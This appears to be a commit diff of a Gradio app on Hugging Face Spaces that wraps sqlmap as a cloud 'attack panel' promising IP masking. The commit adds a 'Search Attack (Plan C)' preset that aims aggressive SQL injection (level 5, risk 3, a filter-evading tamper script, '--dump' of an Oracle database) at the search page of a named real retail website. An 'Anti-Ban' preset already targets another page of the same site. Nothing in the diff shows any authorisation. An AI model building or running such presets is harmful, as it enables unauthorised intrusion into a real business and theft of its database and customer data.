Spaces:
Sleeping
Sleeping
AlphaWolf
commited on
Commit
Β·
52d0ea4
1
Parent(s):
f428ce2
Add Search Attack (Plan C) preset
Browse files
app.py
CHANGED
|
@@ -78,7 +78,6 @@ def run_sqlmap(url, threads, level, risk, tamper, techn, proxy, extra_args):
|
|
| 78 |
yield f"β Fatal Error: {str(e)}"
|
| 79 |
|
| 80 |
# Pre-filled shortcuts
|
| 81 |
-
# UPDATED: Added --force-ssl --unstable --random-agent --no-cast
|
| 82 |
def set_hashi_victory():
|
| 83 |
return (
|
| 84 |
"https://hashi.ae/shop/page/4/?add-to-cart=638",
|
|
@@ -87,6 +86,14 @@ def set_hashi_victory():
|
|
| 87 |
"--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast"
|
| 88 |
)
|
| 89 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 90 |
with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo:
|
| 91 |
gr.Markdown("# π SLMP Cloud Runner - Ultra Speed π©οΈ")
|
| 92 |
gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth and IP masking. Designed for the Alpha Wolf.")
|
|
@@ -110,7 +117,9 @@ with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate"))
|
|
| 110 |
|
| 111 |
with gr.Row():
|
| 112 |
btn_run = gr.Button("π₯ START SCAN", variant="primary")
|
| 113 |
-
|
|
|
|
|
|
|
| 114 |
btn_stop = gr.Button("π STOP", variant="stop")
|
| 115 |
|
| 116 |
with gr.Column(scale=3):
|
|
@@ -129,6 +138,11 @@ with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate"))
|
|
| 129 |
outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]
|
| 130 |
)
|
| 131 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 132 |
if __name__ == "__main__":
|
| 133 |
print("β¨ SLMP Panel Live.")
|
| 134 |
demo.queue().launch(server_name="0.0.0.0", server_port=7860)
|
|
|
|
| 78 |
yield f"β Fatal Error: {str(e)}"
|
| 79 |
|
| 80 |
# Pre-filled shortcuts
|
|
|
|
| 81 |
def set_hashi_victory():
|
| 82 |
return (
|
| 83 |
"https://hashi.ae/shop/page/4/?add-to-cart=638",
|
|
|
|
| 86 |
"--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast"
|
| 87 |
)
|
| 88 |
|
| 89 |
+
def set_search_attack():
|
| 90 |
+
return (
|
| 91 |
+
"https://hashi.ae/?s=iphone",
|
| 92 |
+
10, 5, 3,
|
| 93 |
+
"space2comment", "BEU", "",
|
| 94 |
+
"--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast"
|
| 95 |
+
)
|
| 96 |
+
|
| 97 |
with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo:
|
| 98 |
gr.Markdown("# π SLMP Cloud Runner - Ultra Speed π©οΈ")
|
| 99 |
gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth and IP masking. Designed for the Alpha Wolf.")
|
|
|
|
| 117 |
|
| 118 |
with gr.Row():
|
| 119 |
btn_run = gr.Button("π₯ START SCAN", variant="primary")
|
| 120 |
+
with gr.Row():
|
| 121 |
+
btn_hashi = gr.Button("π° Hashi Victory (Anti-Ban)", variant="secondary")
|
| 122 |
+
btn_search = gr.Button("π Search Attack (Plan C)", variant="stop")
|
| 123 |
btn_stop = gr.Button("π STOP", variant="stop")
|
| 124 |
|
| 125 |
with gr.Column(scale=3):
|
|
|
|
| 138 |
outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]
|
| 139 |
)
|
| 140 |
|
| 141 |
+
btn_search.click(
|
| 142 |
+
fn=set_search_attack,
|
| 143 |
+
outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]
|
| 144 |
+
)
|
| 145 |
+
|
| 146 |
if __name__ == "__main__":
|
| 147 |
print("β¨ SLMP Panel Live.")
|
| 148 |
demo.queue().launch(server_name="0.0.0.0", server_port=7860)
|